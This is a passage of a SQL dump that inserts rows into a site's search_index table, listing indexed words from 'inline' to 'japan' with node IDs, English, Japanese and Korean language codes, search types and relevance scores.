('inline', 39, 'ja', 'help_search', 27),
('inline', 39, 'ko', 'help_search', 27),
('inline', 42, 'en', 'help_search', 1.98493),
('inline', 42, 'ja', 'help_search', 1.98493),
('inline', 42, 'ko', 'help_search', 1.98493),
('inline', 43, 'en', 'help_search', 1),
('inline', 43, 'ja', 'help_search', 1),
('inline', 43, 'ko', 'help_search', 1),
('inplace', 43, 'en', 'help_search', 2),
('inplace', 43, 'ja', 'help_search', 2),
('inplace', 43, 'ko', 'help_search', 2),
('input', 28, 'en', 'help_search', 1),
('input', 28, 'ja', 'help_search', 1),
('input', 28, 'ko', 'help_search', 1),
('insert', 86, 'en', 'help_search', 1),
('insert', 86, 'ja', 'help_search', 1),
('insert', 86, 'ko', 'help_search', 1),
('insight', 122, 'en', 'node_search', 1),
('inspect', 31, 'en', 'node_search', 1),
('inspected', 9, 'en', 'node_search', 3),
('inspected', 17, 'en', 'node_search', 4),
('inspiring', 171, 'en', 'node_search', 1),
('install', 23, 'en', 'help_search', 1),
('install', 23, 'ja', 'help_search', 1),
('install', 23, 'ko', 'help_search', 1),
('install', 30, 'en', 'help_search', 4),
('install', 30, 'ja', 'help_search', 4),
('install', 30, 'ko', 'help_search', 4),
('install', 41, 'en', 'help_search', 1),
('install', 41, 'ja', 'help_search', 1),
('install', 41, 'ko', 'help_search', 1),
('install', 43, 'en', 'help_search', 3.75596),
('install', 43, 'ja', 'help_search', 3.75596),
('install', 43, 'ko', 'help_search', 3.75596),
('install', 45, 'en', 'help_search', 1),
('install', 45, 'ja', 'help_search', 1);
INSERT INTO `search_index` (`word`, `sid`, `langcode`, `type`, `score`) VALUES
('install', 45, 'ko', 'help_search', 1),
('install', 46, 'en', 'help_search', 1),
('install', 46, 'ja', 'help_search', 1),
('install', 46, 'ko', 'help_search', 1),
('install', 74, 'en', 'help_search', 10),
('install', 74, 'ja', 'help_search', 10),
('install', 74, 'ko', 'help_search', 10),
('install', 77, 'en', 'help_search', 6),
('install', 77, 'ja', 'help_search', 6),
('install', 77, 'ko', 'help_search', 6),
('install', 93, 'en', 'help_search', 1),
('install', 93, 'ja', 'help_search', 1),
('install', 93, 'ko', 'help_search', 1),
('installation', 30, 'en', 'help_search', 1),
('installation', 30, 'ja', 'help_search', 1),
('installation', 30, 'ko', 'help_search', 1),
('installation', 62, 'en', 'help_search', 1),
('installation', 62, 'ja', 'help_search', 1),
('installation', 62, 'ko', 'help_search', 1),
('installed', 2, 'en', 'help_search', 1),
('installed', 2, 'ja', 'help_search', 1),
('installed', 2, 'ko', 'help_search', 1),
('installed', 7, 'en', 'help_search', 1),
('installed', 7, 'ja', 'help_search', 1),
('installed', 7, 'ko', 'help_search', 1),
('installed', 8, 'en', 'help_search', 1),
('installed', 8, 'ja', 'help_search', 1),
('installed', 8, 'ko', 'help_search', 1),
('installed', 10, 'en', 'help_search', 1),
('installed', 10, 'ja', 'help_search', 1),
('installed', 10, 'ko', 'help_search', 1),
('installed', 22, 'en', 'help_search', 2),
('installed', 22, 'ja', 'help_search', 2),
('installed', 22, 'ko', 'help_search', 2),
('installed', 23, 'en', 'help_search', 1.96109),
('installed', 23, 'ja', 'help_search', 1.96109),
('installed', 23, 'ko', 'help_search', 1.96109),
('installed', 28, 'en', 'help_search', 1.81085),
('installed', 28, 'ja', 'help_search', 1.81085),
('installed', 28, 'ko', 'help_search', 1.81085),
('installed', 32, 'en', 'help_search', 1.99731),
('installed', 32, 'ja', 'help_search', 1.99731),
('installed', 32, 'ko', 'help_search', 1.99731),
('installed', 33, 'en', 'help_search', 1),
('installed', 33, 'ja', 'help_search', 1),
('installed', 33, 'ko', 'help_search', 1),
('installed', 35, 'en', 'help_search', 1),
('installed', 35, 'ja', 'help_search', 1),
('installed', 35, 'ko', 'help_search', 1),
('installed', 39, 'en', 'help_search', 2),
('installed', 39, 'ja', 'help_search', 2),
('installed', 39, 'ko', 'help_search', 2),
('installed', 40, 'en', 'help_search', 1),
('installed', 40, 'ja', 'help_search', 1),
('installed', 40, 'ko', 'help_search', 1),
('installed', 43, 'en', 'help_search', 1),
('installed', 43, 'ja', 'help_search', 1),
('installed', 43, 'ko', 'help_search', 1),
('installed', 45, 'en', 'help_search', 2),
('installed', 45, 'ja', 'help_search', 2),
('installed', 45, 'ko', 'help_search', 2),
('installed', 49, 'en', 'help_search', 1),
('installed', 49, 'ja', 'help_search', 1),
('installed', 49, 'ko', 'help_search', 1),
('installed', 50, 'en', 'help_search', 1),
('installed', 50, 'ja', 'help_search', 1),
('installed', 50, 'ko', 'help_search', 1),
('installed', 53, 'en', 'help_search', 1),
('installed', 53, 'ja', 'help_search', 1),
('installed', 53, 'ko', 'help_search', 1),
('installed', 57, 'en', 'help_search', 1),
('installed', 57, 'ja', 'help_search', 1),
('installed', 57, 'ko', 'help_search', 1),
('installed', 60, 'en', 'help_search', 3),
('installed', 60, 'ja', 'help_search', 3),
('installed', 60, 'ko', 'help_search', 3),
('installed', 69, 'en', 'help_search', 2),
('installed', 69, 'ja', 'help_search', 2),
('installed', 69, 'ko', 'help_search', 2),
('installed', 74, 'en', 'help_search', 3),
('installed', 74, 'ja', 'help_search', 3),
('installed', 74, 'ko', 'help_search', 3),
('installed', 75, 'en', 'help_search', 2),
('installed', 75, 'ja', 'help_search', 2),
('installed', 75, 'ko', 'help_search', 2),
('installed', 76, 'en', 'help_search', 2),
('installed', 76, 'ja', 'help_search', 2),
('installed', 76, 'ko', 'help_search', 2),
('installed', 77, 'en', 'help_search', 5),
('installed', 77, 'ja', 'help_search', 5),
('installed', 77, 'ko', 'help_search', 5),
('installed', 78, 'en', 'help_search', 6),
('installed', 78, 'ja', 'help_search', 6),
('installed', 78, 'ko', 'help_search', 6),
('installed', 79, 'en', 'help_search', 2),
('installed', 79, 'ja', 'help_search', 2),
('installed', 79, 'ko', 'help_search', 2),
('installed', 81, 'en', 'help_search', 2),
('installed', 81, 'ja', 'help_search', 2),
('installed', 81, 'ko', 'help_search', 2),
('installed', 84, 'en', 'help_search', 1),
('installed', 84, 'ja', 'help_search', 1),
('installed', 84, 'ko', 'help_search', 1),
('installed', 89, 'en', 'help_search', 2),
('installed', 89, 'ja', 'help_search', 2),
('installed', 89, 'ko', 'help_search', 2),
('installed', 93, 'en', 'help_search', 1.59269),
('installed', 93, 'ja', 'help_search', 1.59269),
('installed', 93, 'ko', 'help_search', 1.59269),
('installing', 23, 'en', 'help_search', 1),
('installing', 23, 'ja', 'help_search', 1),
('installing', 23, 'ko', 'help_search', 1),
('installing', 30, 'en', 'help_search', 0.942091),
('installing', 30, 'ja', 'help_search', 0.942091),
('installing', 30, 'ko', 'help_search', 0.942091),
('installing', 33, 'en', 'help_search', 20),
('installing', 33, 'ja', 'help_search', 20),
('installing', 33, 'ko', 'help_search', 20),
('installing', 34, 'en', 'help_search', 1),
('installing', 34, 'ja', 'help_search', 1),
('installing', 34, 'ko', 'help_search', 1),
('installing', 68, 'en', 'help_search', 1),
('installing', 68, 'ja', 'help_search', 1),
('installing', 68, 'ko', 'help_search', 1),
('installing', 74, 'en', 'help_search', 26),
('installing', 74, 'ja', 'help_search', 26),
('installing', 74, 'ko', 'help_search', 26),
('installing', 77, 'en', 'help_search', 26),
('installing', 77, 'ja', 'help_search', 26),
('installing', 77, 'ko', 'help_search', 26),
('instance', 6, 'en', 'help_search', 2),
('instance', 6, 'ja', 'help_search', 2),
('instance', 6, 'ko', 'help_search', 2),
('instance', 30, 'en', 'help_search', 6.60419),
('instance', 30, 'ja', 'help_search', 6.60419),
('instance', 30, 'ko', 'help_search', 6.60419),
('instance', 80, 'en', 'help_search', 1),
('instance', 80, 'ja', 'help_search', 1),
('instance', 80, 'ko', 'help_search', 1),
('instances', 30, 'en', 'help_search', 3.54852),
('instances', 30, 'ja', 'help_search', 3.54852),
('instances', 30, 'ko', 'help_search', 3.54852),
('instead', 7, 'en', 'help_search', 1),
('instead', 7, 'ja', 'help_search', 1),
('instead', 7, 'ko', 'help_search', 1),
('instead', 10, 'en', 'help_search', 1),
('instead', 10, 'ja', 'help_search', 1),
('instead', 10, 'ko', 'help_search', 1),
('instead', 23, 'en', 'help_search', 1),
('instead', 23, 'ja', 'help_search', 1),
('instead', 23, 'ko', 'help_search', 1),
('instead', 28, 'en', 'help_search', 0.934703),
('instead', 28, 'ja', 'help_search', 0.934703),
('instead', 28, 'ko', 'help_search', 0.934703),
('instead', 29, 'en', 'help_search', 1),
('instead', 29, 'ja', 'help_search', 1),
('instead', 29, 'ko', 'help_search', 1),
('instead', 37, 'en', 'help_search', 1),
('instead', 37, 'ja', 'help_search', 1),
('instead', 37, 'ko', 'help_search', 1),
('instead', 42, 'en', 'help_search', 1),
('instead', 42, 'ja', 'help_search', 1),
('instead', 42, 'ko', 'help_search', 1),
('instead', 60, 'en', 'help_search', 1),
('instead', 60, 'ja', 'help_search', 1),
('instead', 60, 'ko', 'help_search', 1),
('instructed', 133, 'en', 'node_search', 1),
('instruction', 67, 'ja', 'node_search', 1),
('instruction', 136, 'en', 'node_search', 1),
('instruction', 138, 'en', 'node_search', 1),
('instruction', 142, 'en', 'node_search', 1),
('instructions', 11, 'en', 'help_search', 1),
('instructions', 11, 'ja', 'help_search', 1),
('instructions', 11, 'ko', 'help_search', 1),
('instructions', 46, 'en', 'help_search', 0.945829),
('instructions', 46, 'ja', 'help_search', 0.945829),
('instructions', 46, 'ko', 'help_search', 0.945829),
('instructions', 73, 'en', 'help_search', 1),
('instructions', 73, 'ja', 'help_search', 1),
('instructions', 73, 'ko', 'help_search', 1),
('instructions', 79, 'en', 'help_search', 1),
('instructions', 79, 'ja', 'help_search', 1),
('instructions', 79, 'ko', 'help_search', 1),
('instructor', 133, 'en', 'node_search', 1),
('instructors', 133, 'en', 'node_search', 1),
('instructors', 135, 'en', 'node_search', 1),
('instructors', 136, 'en', 'node_search', 1),
('insurance', 8, 'en', 'node_search', 2),
('intake', 155, 'en', 'node_search', 5),
('integrity', 24, 'en', 'node_search', 0.833529),
('integrity', 24, 'ja', 'node_search', 0.482973),
('integrity', 24, 'ko', 'node_search', 0.851346),
('integrity', 25, 'en', 'node_search', 1),
('integrity', 26, 'en', 'node_search', 1),
('integrity', 26, 'ja', 'node_search', 1),
('interactions', 31, 'ja', 'help_search', 1),
('interest', 22, 'en', 'help_search', 1),
('interest', 22, 'ja', 'help_search', 1),
('interest', 22, 'ko', 'help_search', 1),
('interest', 87, 'en', 'help_search', 3),
('interest', 87, 'ja', 'help_search', 3),
('interest', 87, 'ko', 'help_search', 3),
('interested', 162, 'en', 'node_search', 0.879565),
('interface', 2, 'en', 'help_search', 1),
('interface', 2, 'ja', 'help_search', 1),
('interface', 2, 'ko', 'help_search', 1),
('interface', 5, 'en', 'help_search', 1),
('interface', 5, 'ja', 'help_search', 1),
('interface', 5, 'ko', 'help_search', 1),
('interface', 8, 'en', 'help_search', 1),
('interface', 8, 'ja', 'help_search', 1),
('interface', 8, 'ko', 'help_search', 1),
('interface', 29, 'en', 'help_search', 1),
('interface', 29, 'ja', 'help_search', 1),
('interface', 29, 'ko', 'help_search', 1),
('interface', 30, 'en', 'help_search', 0.727213),
('interface', 30, 'ja', 'help_search', 0.727213),
('interface', 30, 'ko', 'help_search', 0.727213),
('interface', 35, 'en', 'help_search', 2),
('interface', 35, 'ja', 'help_search', 2),
('interface', 35, 'ko', 'help_search', 2),
('interface', 36, 'en', 'help_search', 1),
('interface', 36, 'ja', 'help_search', 1),
('interface', 36, 'ko', 'help_search', 1),
('interface', 41, 'en', 'help_search', 3),
('interface', 41, 'ja', 'help_search', 3),
('interface', 41, 'ko', 'help_search', 3),
('interface', 42, 'en', 'help_search', 32),
('interface', 42, 'ja', 'help_search', 32),
('interface', 42, 'ko', 'help_search', 32),
('interface', 43, 'en', 'help_search', 66.3775),
('interface', 43, 'ja', 'help_search', 66.3775),
('interface', 43, 'ko', 'help_search', 66.3775),
('interface', 46, 'en', 'help_search', 2),
('interface', 46, 'ja', 'help_search', 2),
('interface', 46, 'ko', 'help_search', 2),
('interface', 50, 'en', 'help_search', 2),
('interface', 50, 'ja', 'help_search', 2),
('interface', 50, 'ko', 'help_search', 2),
('interface', 51, 'en', 'help_search', 5),
('interface', 51, 'ja', 'help_search', 5),
('interface', 51, 'ko', 'help_search', 5),
('interface', 52, 'en', 'help_search', 29),
('interface', 52, 'ja', 'help_search', 29),
('interface', 52, 'ko', 'help_search', 29),
('interface', 53, 'en', 'help_search', 32),
('interface', 53, 'ja', 'help_search', 32),
('interface', 53, 'ko', 'help_search', 32),
('interface', 60, 'en', 'help_search', 1),
('interface', 60, 'ja', 'help_search', 1),
('interface', 60, 'ko', 'help_search', 1),
('interface', 79, 'en', 'help_search', 2),
('interface', 79, 'ja', 'help_search', 2),
('interface', 79, 'ko', 'help_search', 2),
('interface', 80, 'en', 'help_search', 0.931053),
('interface', 80, 'ja', 'help_search', 0.931053),
('interface', 80, 'ko', 'help_search', 0.931053),
('interface', 81, 'en', 'help_search', 1),
('interface', 81, 'ja', 'help_search', 1),
('interface', 81, 'ko', 'help_search', 1),
('interface', 88, 'en', 'help_search', 1),
('interface', 88, 'ja', 'help_search', 1),
('interface', 88, 'ko', 'help_search', 1),
('interface', 90, 'en', 'help_search', 1),
('interface', 90, 'ja', 'help_search', 1),
('interface', 90, 'ko', 'help_search', 1),
('interface', 93, 'en', 'help_search', 0.794753),
('interface', 93, 'ja', 'help_search', 0.794753),
('interface', 93, 'ko', 'help_search', 0.794753),
('interfaces', 42, 'en', 'help_search', 1),
('interfaces', 42, 'ja', 'help_search', 1),
('interfaces', 42, 'ko', 'help_search', 1),
('interior', 27, 'en', 'node_search', 0.745294),
('internal', 37, 'en', 'help_search', 20.4433),
('internal', 37, 'ja', 'help_search', 20.4433),
('internal', 37, 'ko', 'help_search', 20.4433),
('internal', 56, 'en', 'help_search', 1),
('internal', 56, 'ja', 'help_search', 1),
('internal', 56, 'ko', 'help_search', 1),
('internal', 70, 'en', 'help_search', 1),
('internal', 70, 'ja', 'help_search', 1),
('internal', 70, 'ko', 'help_search', 1),
('international', 24, 'en', 'node_search', 0.836446),
('international', 24, 'ja', 'node_search', 0.484898),
('international', 24, 'ko', 'node_search', 0.857458),
('international', 25, 'en', 'node_search', 1),
('international', 26, 'en', 'node_search', 3),
('international', 26, 'ja', 'node_search', 2),
('international', 164, 'en', 'node_search', 1),
('international', 173, 'en', 'node_search', 1),
('international', 175, 'en', 'node_search', 1),
('international', 185, 'en', 'node_search', 1),
('international', 186, 'en', 'node_search', 1),
('international', 194, 'en', 'node_search', 28),
('international', 195, 'en', 'node_search', 1),
('international', 197, 'en', 'node_search', 1),
('internship', 116, 'en', 'node_search', 46),
('internship', 116, 'ja', 'node_search', 27),
('internship', 122, 'en', 'node_search', 47),
('internship', 122, 'ja', 'node_search', 27),
('internships', 116, 'en', 'node_search', 1),
('interview', 24, 'en', 'node_search', 0.781775),
('interview', 24, 'ja', 'node_search', 0.441034),
('interview', 31, 'en', 'node_search', 2),
('interview', 70, 'en', 'node_search', 1),
('interview', 71, 'en', 'node_search', 1),
('interview', 72, 'en', 'node_search', 1),
('interview', 74, 'en', 'node_search', 1),
('interview', 75, 'en', 'node_search', 1),
('interview', 81, 'en', 'node_search', 31),
('interview', 81, 'ja', 'node_search', 27),
('interview', 82, 'en', 'node_search', 1),
('interview', 84, 'en', 'node_search', 1),
('interview', 85, 'en', 'node_search', 4),
('interview', 90, 'en', 'node_search', 1),
('interview', 98, 'en', 'node_search', 1),
('interview', 100, 'en', 'node_search', 4),
('interview', 101, 'en', 'node_search', 1),
('interview', 102, 'en', 'node_search', 1),
('interview', 107, 'en', 'node_search', 1),
('interview', 109, 'en', 'node_search', 1),
('interview', 110, 'en', 'node_search', 1),
('interview', 112, 'en', 'node_search', 1),
('interview', 114, 'en', 'node_search', 1),
('interview', 115, 'en', 'node_search', 1),
('interview', 117, 'en', 'node_search', 1),
('interview', 120, 'en', 'node_search', 49),
('interview', 120, 'ja', 'node_search', 27),
('interview', 131, 'en', 'node_search', 1),
('interview', 132, 'en', 'node_search', 1),
('interview', 134, 'en', 'node_search', 28),
('interview', 134, 'ja', 'node_search', 27),
('interview', 137, 'en', 'node_search', 1),
('interview', 139, 'en', 'node_search', 1),
('interview', 140, 'en', 'node_search', 1),
('interview', 141, 'en', 'node_search', 1),
('interview', 143, 'en', 'node_search', 1),
('interview', 144, 'en', 'node_search', 1),
('interview', 146, 'en', 'node_search', 26),
('interview', 146, 'ja', 'node_search', 27),
('interview', 149, 'en', 'node_search', 47),
('interview', 160, 'en', 'node_search', 32),
('interview', 161, 'en', 'node_search', 36),
('interview', 166, 'en', 'node_search', 36),
('interview', 168, 'en', 'node_search', 33),
('interview', 170, 'en', 'node_search', 32),
('interview', 173, 'en', 'node_search', 1),
('interview', 178, 'en', 'node_search', 7),
('interview', 179, 'en', 'node_search', 34),
('interview', 180, 'en', 'node_search', 34),
('interview', 184, 'en', 'node_search', 1),
('interview', 185, 'en', 'node_search', 6),
('interview', 186, 'en', 'node_search', 7),
('interview', 187, 'en', 'node_search', 36),
('interview', 188, 'en', 'node_search', 33),
('interview', 189, 'en', 'node_search', 37),
('interview', 190, 'en', 'node_search', 37),
('interview', 191, 'en', 'node_search', 38),
('interview', 192, 'en', 'node_search', 34),
('interview', 193, 'en', 'node_search', 37),
('interview', 194, 'en', 'node_search', 37),
('interview', 195, 'en', 'node_search', 6),
('interview', 196, 'en', 'node_search', 37),
('interview', 197, 'en', 'node_search', 37),
('interview', 198, 'en', 'node_search', 7),
('interview', 199, 'en', 'node_search', 36),
('interviewpassers', 138, 'en', 'node_search', 1),
('interviewpassing', 133, 'en', 'node_search', 1),
('interviews', 67, 'ja', 'node_search', 1),
('interviews', 135, 'en', 'node_search', 1),
('interviews', 136, 'en', 'node_search', 2),
('interviews', 138, 'en', 'node_search', 1),
('interviews', 142, 'en', 'node_search', 1),
('interviews', 155, 'en', 'node_search', 1),
('into', 2, 'en', 'help_search', 1),
('into', 2, 'ja', 'help_search', 1),
('into', 2, 'ko', 'help_search', 1),
('into', 3, 'en', 'help_search', 1),
('into', 3, 'ja', 'help_search', 1),
('into', 3, 'ko', 'help_search', 1),
('into', 6, 'en', 'help_search', 2),
('into', 6, 'ja', 'help_search', 2),
('into', 6, 'ko', 'help_search', 2),
('into', 7, 'en', 'node_search', 2),
('into', 7, 'ko', 'node_search', 2),
('into', 11, 'en', 'help_search', 1),
('into', 11, 'ja', 'help_search', 1),
('into', 11, 'ko', 'help_search', 1),
('into', 13, 'en', 'help_search', 1),
('into', 13, 'ja', 'help_search', 1),
('into', 13, 'ko', 'help_search', 1),
('into', 15, 'en', 'help_search', 1),
('into', 15, 'ja', 'help_search', 1),
('into', 15, 'ko', 'help_search', 1),
('into', 28, 'en', 'help_search', 5),
('into', 28, 'ja', 'help_search', 5),
('into', 28, 'ko', 'help_search', 5),
('into', 30, 'en', 'help_search', 2.53391),
('into', 30, 'ja', 'help_search', 2.53391),
('into', 30, 'ko', 'help_search', 2.53391),
('into', 31, 'ja', 'help_search', 3),
('into', 35, 'en', 'help_search', 1),
('into', 35, 'ja', 'help_search', 1),
('into', 35, 'ko', 'help_search', 1),
('into', 37, 'en', 'help_search', 1),
('into', 37, 'ja', 'help_search', 1),
('into', 37, 'ko', 'help_search', 1),
('into', 41, 'en', 'help_search', 2),
('into', 41, 'ja', 'help_search', 2),
('into', 41, 'ko', 'help_search', 2),
('into', 44, 'en', 'help_search', 1),
('into', 44, 'ja', 'help_search', 1),
('into', 44, 'ko', 'help_search', 1),
('into', 46, 'en', 'help_search', 1),
('into', 46, 'ja', 'help_search', 1),
('into', 46, 'ko', 'help_search', 1),
('into', 52, 'en', 'help_search', 1),
('into', 52, 'ja', 'help_search', 1),
('into', 52, 'ko', 'help_search', 1),
('into', 58, 'en', 'help_search', 1),
('into', 58, 'ja', 'help_search', 1),
('into', 58, 'ko', 'help_search', 1),
('into', 62, 'en', 'help_search', 1),
('into', 62, 'en', 'node_search', 3.97258),
('into', 62, 'ja', 'help_search', 1),
('into', 62, 'ko', 'help_search', 1),
('into', 67, 'en', 'help_search', 1),
('into', 67, 'ja', 'help_search', 1),
('into', 67, 'ko', 'help_search', 1),
('into', 68, 'en', 'help_search', 3),
('into', 68, 'ja', 'help_search', 3),
('into', 68, 'ko', 'help_search', 3),
('into', 70, 'en', 'help_search', 1),
('into', 70, 'ja', 'help_search', 1),
('into', 70, 'ko', 'help_search', 1),
('into', 73, 'en', 'help_search', 8),
('into', 73, 'ja', 'help_search', 8),
('into', 73, 'ko', 'help_search', 8),
('into', 74, 'en', 'help_search', 1),
('into', 74, 'ja', 'help_search', 1),
('into', 74, 'ko', 'help_search', 1),
('into', 75, 'en', 'help_search', 1),
('into', 75, 'ja', 'help_search', 1),
('into', 75, 'ko', 'help_search', 1),
('into', 86, 'en', 'help_search', 1),
('into', 86, 'ja', 'help_search', 1),
('into', 86, 'ko', 'help_search', 1),
('into', 87, 'en', 'node_search', 1),
('into', 122, 'en', 'node_search', 1),
('into', 199, 'en', 'node_search', 27),
('into', 204, 'en', 'node_search', 4),
('into', 204, 'ja', 'node_search', 4),
('introduce', 162, 'en', 'node_search', 1),
('introduction', 142, 'en', 'node_search', 1),
('invalid', 72, 'en', 'help_search', 1),
('invalid', 72, 'ja', 'help_search', 1),
('invalid', 72, 'ko', 'help_search', 1),
('invaluable', 62, 'en', 'node_search', 1),
('invaluable', 120, 'en', 'node_search', 1),
('invaluable', 136, 'en', 'node_search', 1),
('invest', 3, 'en', 'node_search', 1),
('invest', 3, 'ko', 'node_search', 1),
('involves', 162, 'en', 'node_search', 1),
('iom', 26, 'en', 'node_search', 1),
('iom', 26, 'ja', 'node_search', 1),
('iom', 26, 'ko', 'node_search', 1),
('iris', 24, 'en', 'node_search', 0.827757),
('iris', 24, 'ja', 'node_search', 0.481063),
('iris', 24, 'ko', 'node_search', 0.860547),
('iris', 26, 'en', 'node_search', 1),
('iris', 26, 'ja', 'node_search', 1),
('iris', 26, 'ko', 'node_search', 1),
('irrawaddy', 27, 'en', 'node_search', 1),
('item', 9, 'en', 'help_search', 2),
('item', 9, 'ja', 'help_search', 2),
('item', 9, 'ko', 'help_search', 2),
('item', 13, 'en', 'help_search', 31),
('item', 13, 'ja', 'help_search', 31),
('item', 13, 'ko', 'help_search', 31),
('item', 15, 'en', 'help_search', 32),
('item', 15, 'ja', 'help_search', 32),
('item', 15, 'ko', 'help_search', 32),
('item', 16, 'en', 'help_search', 2),
('item', 16, 'ja', 'help_search', 2),
('item', 16, 'ko', 'help_search', 2),
('item', 24, 'en', 'help_search', 1),
('item', 24, 'ja', 'help_search', 1),
('item', 24, 'ko', 'help_search', 1),
('item', 27, 'en', 'help_search', 5),
('item', 27, 'ja', 'help_search', 5),
('item', 27, 'ko', 'help_search', 5),
('item', 30, 'en', 'help_search', 2),
('item', 30, 'ja', 'help_search', 2),
('item', 30, 'ko', 'help_search', 2),
('item', 31, 'ja', 'help_search', 6.85498),
('item', 47, 'en', 'help_search', 1),
('item', 47, 'ja', 'help_search', 1),
('item', 47, 'ko', 'help_search', 1),
('item', 54, 'en', 'help_search', 1),
('item', 54, 'ja', 'help_search', 1),
('item', 54, 'ko', 'help_search', 1),
('item', 55, 'en', 'help_search', 5),
('item', 55, 'ja', 'help_search', 5),
('item', 55, 'ko', 'help_search', 5),
('item', 56, 'en', 'help_search', 1),
('item', 56, 'ja', 'help_search', 1),
('item', 56, 'ko', 'help_search', 1),
('item', 59, 'en', 'help_search', 39.8792),
('item', 59, 'ja', 'help_search', 39.8792),
('item', 59, 'ko', 'help_search', 39.8792),
('item', 61, 'en', 'help_search', 39.363),
('item', 61, 'ja', 'help_search', 39.363),
('item', 61, 'ko', 'help_search', 39.363),
('item', 62, 'en', 'help_search', 24),
('item', 62, 'ja', 'help_search', 24),
('item', 62, 'ko', 'help_search', 24),
('item', 63, 'en', 'help_search', 41),
('item', 63, 'ja', 'help_search', 41),
('item', 63, 'ko', 'help_search', 41),
('item', 65, 'en', 'help_search', 1),
('item', 65, 'ja', 'help_search', 1),
('item', 65, 'ko', 'help_search', 1),
('item', 89, 'en', 'help_search', 1),
('item', 89, 'ja', 'help_search', 1),
('item', 89, 'ko', 'help_search', 1),
('item', 91, 'en', 'help_search', 3),
('item', 91, 'ja', 'help_search', 3),
('item', 91, 'ko', 'help_search', 3),
('item', 93, 'en', 'help_search', 1.87313),
('item', 93, 'ja', 'help_search', 1.87313),
('item', 93, 'ko', 'help_search', 1.87313),
('items', 7, 'en', 'help_search', 1),
('items', 7, 'ja', 'help_search', 1),
('items', 7, 'ko', 'help_search', 1),
('items', 10, 'en', 'help_search', 8),
('items', 10, 'ja', 'help_search', 8),
('items', 10, 'ko', 'help_search', 8),
('items', 29, 'en', 'help_search', 1),
('items', 29, 'ja', 'help_search', 1),
('items', 29, 'ko', 'help_search', 1),
('items', 30, 'en', 'help_search', 1.75231),
('items', 30, 'ja', 'help_search', 1.75231),
('items', 30, 'ko', 'help_search', 1.75231),
('items', 31, 'ja', 'help_search', 3.84729),
('items', 35, 'en', 'help_search', 26),
('items', 35, 'ja', 'help_search', 26),
('items', 35, 'ko', 'help_search', 26),
('items', 36, 'en', 'help_search', 1),
('items', 36, 'ja', 'help_search', 1),
('items', 36, 'ko', 'help_search', 1),
('items', 40, 'en', 'help_search', 1),
('items', 40, 'ja', 'help_search', 1),
('items', 40, 'ko', 'help_search', 1),
('items', 41, 'en', 'help_search', 2),
('items', 41, 'ja', 'help_search', 2),
('items', 41, 'ko', 'help_search', 2),
('items', 54, 'en', 'help_search', 1),
('items', 54, 'ja', 'help_search', 1),
('items', 54, 'ko', 'help_search', 1),
('items', 55, 'en', 'help_search', 2),
('items', 55, 'ja', 'help_search', 2),
('items', 55, 'ko', 'help_search', 2),
('items', 59, 'en', 'help_search', 2),
('items', 59, 'ja', 'help_search', 2),
('items', 59, 'ko', 'help_search', 2),
('items', 61, 'en', 'help_search', 10.9534),
('items', 61, 'ja', 'help_search', 10.9534),
('items', 61, 'ko', 'help_search', 10.9534),
('items', 62, 'en', 'help_search', 3),
('items', 62, 'ja', 'help_search', 3),
('items', 62, 'ko', 'help_search', 3),
('items', 65, 'en', 'help_search', 1),
('items', 65, 'ja', 'help_search', 1),
('items', 65, 'ko', 'help_search', 1),
('items', 67, 'en', 'help_search', 4),
('items', 67, 'ja', 'help_search', 4),
('items', 67, 'ko', 'help_search', 4),
('items', 80, 'en', 'help_search', 3.95959),
('items', 80, 'ja', 'help_search', 3.95959),
('items', 80, 'ko', 'help_search', 3.95959),
('items', 90, 'en', 'help_search', 1),
('items', 90, 'ja', 'help_search', 1),
('items', 90, 'ko', 'help_search', 1),
('items', 91, 'en', 'help_search', 1),
('items', 91, 'ja', 'help_search', 1),
('items', 91, 'ko', 'help_search', 1),
('items', 93, 'en', 'help_search', 5.53668),
('items', 93, 'ja', 'help_search', 5.53668),
('items', 93, 'ko', 'help_search', 5.53668),
('its', 5, 'en', 'help_search', 1),
('its', 5, 'ja', 'help_search', 1),
('its', 5, 'ko', 'help_search', 1),
('its', 7, 'en', 'help_search', 0.931053),
('its', 7, 'ja', 'help_search', 0.931053),
('its', 7, 'ko', 'help_search', 0.931053),
('its', 11, 'en', 'help_search', 2),
('its', 11, 'ja', 'help_search', 2),
('its', 11, 'ko', 'help_search', 2),
('its', 20, 'en', 'help_search', 1),
('its', 20, 'ja', 'help_search', 1),
('its', 20, 'ko', 'help_search', 1),
('its', 30, 'en', 'help_search', 2.78177),
('its', 30, 'ja', 'help_search', 2.78177),
('its', 30, 'ko', 'help_search', 2.78177),
('its', 32, 'en', 'help_search', 1),
('its', 32, 'ja', 'help_search', 1),
('its', 32, 'ko', 'help_search', 1),
('its', 33, 'en', 'help_search', 2),
('its', 33, 'ja', 'help_search', 2),
('its', 33, 'ko', 'help_search', 2),
('its', 43, 'en', 'help_search', 1),
('its', 43, 'ja', 'help_search', 1),
('its', 43, 'ko', 'help_search', 1),
('its', 44, 'en', 'help_search', 1),
('its', 44, 'ja', 'help_search', 1),
('its', 44, 'ko', 'help_search', 1),
('its', 47, 'en', 'help_search', 1),
('its', 47, 'ja', 'help_search', 1),
('its', 47, 'ko', 'help_search', 1),
('its', 50, 'en', 'help_search', 0.96498),
('its', 50, 'ja', 'help_search', 0.96498),
('its', 50, 'ko', 'help_search', 0.96498),
('its', 59, 'en', 'help_search', 1),
('its', 59, 'ja', 'help_search', 1),
('its', 59, 'ko', 'help_search', 1),
('its', 61, 'en', 'help_search', 1),
('its', 61, 'ja', 'help_search', 1),
('its', 61, 'ko', 'help_search', 1),
('its', 62, 'en', 'help_search', 1),
('its', 62, 'ja', 'help_search', 1),
('its', 62, 'ko', 'help_search', 1),
('its', 80, 'en', 'help_search', 1),
('its', 80, 'ja', 'help_search', 1),
('its', 80, 'ko', 'help_search', 1),
('its', 88, 'en', 'help_search', 1),
('its', 88, 'ja', 'help_search', 1),
('its', 88, 'ko', 'help_search', 1),
('its', 89, 'en', 'help_search', 1),
('its', 89, 'ja', 'help_search', 1),
('its', 89, 'ko', 'help_search', 1),
('its', 91, 'en', 'help_search', 1),
('its', 91, 'ja', 'help_search', 1),
('its', 91, 'ko', 'help_search', 1),
('itself', 7, 'en', 'help_search', 1),
('itself', 7, 'ja', 'help_search', 1),
('itself', 7, 'ko', 'help_search', 1),
('january', 66, 'en', 'node_search', 1),
('january', 184, 'en', 'node_search', 5),
('japan', 23, 'en', 'node_search', 3.52915),
('japan', 24, 'en', 'node_search', 3.63988),
('japan', 27, 'en', 'node_search', 1.945),
('japan', 62, 'en', 'node_search', 1),
('japan', 67, 'ja', 'node_search', 1),
('japan', 68, 'en', 'node_search', 5),
